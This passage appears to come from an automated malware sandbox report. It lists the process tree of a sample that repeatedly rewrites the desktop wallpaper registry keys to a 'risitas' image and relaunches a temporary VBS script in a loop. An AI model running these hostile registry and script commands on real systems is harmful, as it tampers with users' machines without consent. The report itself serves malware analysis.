        5⤵
        
        PID:1664
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:1448
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:1688
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\9574.vbs"
        5⤵
        
        PID:1848
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        Sets desktop wallpaper using registry
        
        PID:2932
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        Sets desktop wallpaper using registry
        
        PID:328
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:1856
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:2976
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:2608
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\9574.vbs"
        5⤵
        
        PID:1268
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        Sets desktop wallpaper using registry
        
        PID:1232
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        
        PID:1472
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:304
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:2860
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:1904
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\9574.vbs"
        5⤵
        
        PID:2568
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        Sets desktop wallpaper using registry
        
        PID:2288
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        Sets desktop wallpaper using registry
        
        PID:1988
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:1420
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:1940
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:2120
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\9574.vbs"
        5⤵
        
        PID:1856
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        Sets desktop wallpaper using registry
        
        PID:2632
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        Sets desktop wallpaper using registry
        
        PID:2116
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:2920
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:2476
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:1328
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\9574.vbs"
        5⤵
        
        PID:2304
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        Sets desktop wallpaper using registry
        
        PID:1680
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        Sets desktop wallpaper using registry
        
        PID:784
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:448
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:2220
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:2488
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\9574.vbs"
        5⤵
        
        PID:2608
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        Sets desktop wallpaper using registry
        
        PID:1556
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        Sets desktop wallpaper using registry
        
        PID:1672
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:328
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:2932
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:1532
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\9574.vbs"
        5⤵
        
        PID:2984
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        Sets desktop wallpaper using registry
        
        PID:2760
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        Sets desktop wallpaper using registry
        
        PID:1120
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:2204
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:2168
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:580
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\9574.vbs"
        5⤵
        
        PID:2800
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        Sets desktop wallpaper using registry
        
        PID:1276
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        Sets desktop wallpaper using registry
        
        PID:328
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:2632
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:2804
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:1520
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\9574.vbs"
        5⤵
        
        PID:2760
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        Sets desktop wallpaper using registry
        
        PID:448
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        Sets desktop wallpaper using registry
        
        PID:2488
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:1636
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:1940
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:2120
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\9574.vbs"
        5⤵
        
        PID:1744
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        Sets desktop wallpaper using registry
        
        PID:1220
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        Sets desktop wallpaper using registry
        
        PID:1264
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:2308
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:1120
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:2168
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\9574.vbs"
        5⤵
        
        PID:564
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        Sets desktop wallpaper using registry
        
        PID:1520
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        
        PID:2920
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:1432
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:1264
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:2308
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\9574.vbs"
        5⤵
        
        PID:2288
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        Sets desktop wallpaper using registry
        
        PID:1940
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        Sets desktop wallpaper using registry
        
        PID:1488
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:1556
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:2632
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:328
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\9574.vbs"
        5⤵
        
        PID:2204
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        Sets desktop wallpaper using registry
        
        PID:2848
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        Sets desktop wallpaper using registry
        
        PID:448
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:1940
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:3024
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:1276
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\9574.vbs"
        5⤵
        
        PID:1512
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        Sets desktop wallpaper using registry
        
        PID:2848
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        
        PID:2404
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:448
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:1940
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:3024
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\9574.vbs"
        5⤵
        
        PID:236
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        
        PID:1492
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        Sets desktop wallpaper using registry
        
        PID:448
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:2920
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:2476
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:1432
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\9574.vbs"
        5⤵
        
        PID:2044
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        Sets desktop wallpaper using registry
        
        PID:1264
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        Sets desktop wallpaper using registry
        
        PID:2308
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:272
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:2848
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:1116
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\9574.vbs"
        5⤵
        
        PID:1116
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        Sets desktop wallpaper using registry
        
        PID:1432
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        Sets desktop wallpaper using registry
        
        PID:1008
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:1328
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:1408
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:2848
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\9574.vbs"
        5⤵
        
        PID:3096
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        Sets desktop wallpaper using registry
        
        PID:3116
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        Sets desktop wallpaper using registry
        
        PID:3128
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:3176
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:3192
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:3204
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\9574.vbs"
        5⤵
        
        PID:3296
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        Sets desktop wallpaper using registry
        
        PID:3324
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        
        PID:3340
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:3356
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:3364
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:3420
    - - C:\Windows\system32\rundll32.exe
        
        "C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\AppData\Local\Temp\9574.vbs
        5⤵
        
        PID:3540
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        
        PID:3560
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        
        PID:3580
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:3596
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:3604
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:3612
    - - C:\Windows\system32\rundll32.exe
        
        "C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\AppData\Local\Temp\9574.vbs
        5⤵
        
        PID:3720
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        
        PID:3740
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        
        PID:3764
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:3772
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:3780
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:3788
    - - C:\Windows\system32\rundll32.exe
        
        "C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\AppData\Local\Temp\9574.vbs
        5⤵
        
        PID:3884
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        
        PID:3904
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        
        PID:3912
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:3920
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:3936
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:3952
    - - C:\Windows\system32\rundll32.exe
        
        "C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\AppData\Local\Temp\9574.vbs
        5⤵
        
        PID:4048
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        
        PID:4068
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        
        PID:4076
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:4088
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:328
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:1432
    - - C:\Windows\system32\rundll32.exe
        
        "C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\AppData\Local\Temp\9574.vbs
        5⤵
        
        PID:3152
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        
        PID:3196
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        
        PID:3208
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:3232
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:3240
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:3248
    - - C:\Windows\system32\rundll32.exe
        
        "C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\AppData\Local\Temp\9574.vbs
        5⤵
        
        PID:3424
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        
        PID:3396
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        
        PID:3404
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:3456
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:3556
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:3428
    - - C:\Windows\system32\rundll32.exe
        
        "C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\AppData\Local\Temp\9574.vbs
        5⤵
        
        PID:2108
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        
        PID:3600
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        
        PID:3608
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:3632
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:3628
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:3644
    - - C:\Windows\system32\rundll32.exe
        
        "C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\AppData\Local\Temp\9574.vbs
        5⤵
        
        PID:3768
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        
        PID:3780
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        
        PID:3788
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:3800
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:3808
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:3828
    - - C:\Windows\system32\rundll32.exe
        
        "C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\AppData\Local\Temp\9574.vbs
        5⤵
        
        PID:3988
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        
        PID:4008
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        
        PID:3960
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:4060
    - - C:\Windows\system32\reg.exe
        
